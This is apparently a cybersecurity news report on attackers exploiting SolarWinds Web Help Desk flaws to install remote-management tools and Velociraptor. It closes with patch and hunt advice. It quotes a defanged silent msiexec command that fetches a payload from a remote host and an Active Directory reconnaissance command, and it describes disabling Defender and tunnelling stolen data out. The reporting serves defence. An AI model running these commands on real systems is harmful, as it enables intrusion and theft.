Attackers Actively Exploiting SolarWinds Web Help Desk Flaw to Seize Control

Cybersecurity teams are raising the alarm as threat actors are now actively and aggressively exploiting a critical vulnerability in SolarWinds Web Help Desk (WHD). This remote code execution flaw is being weaponized to install custom tooling, enabling full system compromise and lateral movement across networks.

The Initial Breach
The attack chain begins with the exploitation of a WHD vulnerability. Security firm Huntress, which observed 84 vulnerable WHD instances across 78 customer environments, reported that attackers used the flaw to execute commands via the service wrapper (wrapper.exe). This initial access was quickly leveraged to silently fetch and install a malicious MSI package from a remote server using a command like:
msiexec /q /i hxxps://files.catbox[.]moe/example.msi

Deployment of RMM for Persistent Access
The first-stage payload was a legitimate Zoho ManageEngine remote management (RMM) agent, hosted on the Catbox file-sharing service. While Zoho Assist is a commercial remote support tool, attackers configured it with a controlled account (tied to a Proton Mail address) to establish persistent, hands-on access to the compromised system. This tactic aligns with a Microsoft warning from February 6th about active exploitation of SolarWinds WHD issues.

Reconnaissance and Escalation
With a foothold established, the attacker performed manual reconnaissance, investigating Active Directory with commands like net group "domain computers" /domain to map the network for lateral movement.

The attacker then deployed Velociraptor, a powerful open-source digital forensics and incident response (DFIR) platform, turning a defender's tool into an offensive command-and-control (C2) framework. An outdated and vulnerable version (0.73.4) was installed via another silent MSI from a Supabase storage bucket. The client communicated with an attacker-controlled server fronted by a Cloudflare Worker.

Strengthening the Foothold
With Velociraptor running as a Windows service, the attacker executed a rapid series of PowerShell commands to:

1. Disable Windows Defender and the local firewall via registry edits.
2. Install cloudflared from GitHub to establish a resilient backup network tunnel.
3. Use Get-ComputerInfo to harvest detailed system data.
4. Exfiltrate that stolen data directly to the attackers' own Elastic Cloud instance via the Bulk API, ironically weaponizing the Elastic SIEM as a victim management dashboard.

A Concerning Pattern of "Living-off-the-Land"
This campaign demonstrates the frightening speed with which attackers can pivot from a single exposed management interface to total network control. By leveraging common administrative and security tools (RMM agents, Velociraptor, Cloudflared, Elastic), their activities blend into normal network traffic, making detection difficult.

Immediate Action Required
If your organization uses SolarWinds Web Help Desk, you must act immediately:

• Patch: Update to Web Help Desk version 2026.1 or later immediately. This addresses the critical flaws tracked as CVE-2025-26399, CVE-2025-40536, and CVE-2025-40551.
• Isolate: Remove all administrative interfaces from direct internet access.
• Investigate: Assume compromise. Change credentials, audit systems for unauthorized remote access software, silent MSI installs, and unusual code execution from WHD processes.
• Hunt: The rapid weaponization indicates active scanning. Defenders should hunt for the TTPs and tools mentioned, particularly unexpected Zoho Assist, Velociraptor, or Cloudflared deployments.

With exploitation spreading, a proactive and assumed-compromise stance is essential for defense.

Follow us on Google News, LinkedIn, and X for daily cybersecurity updates. Have a story to share? Contact us.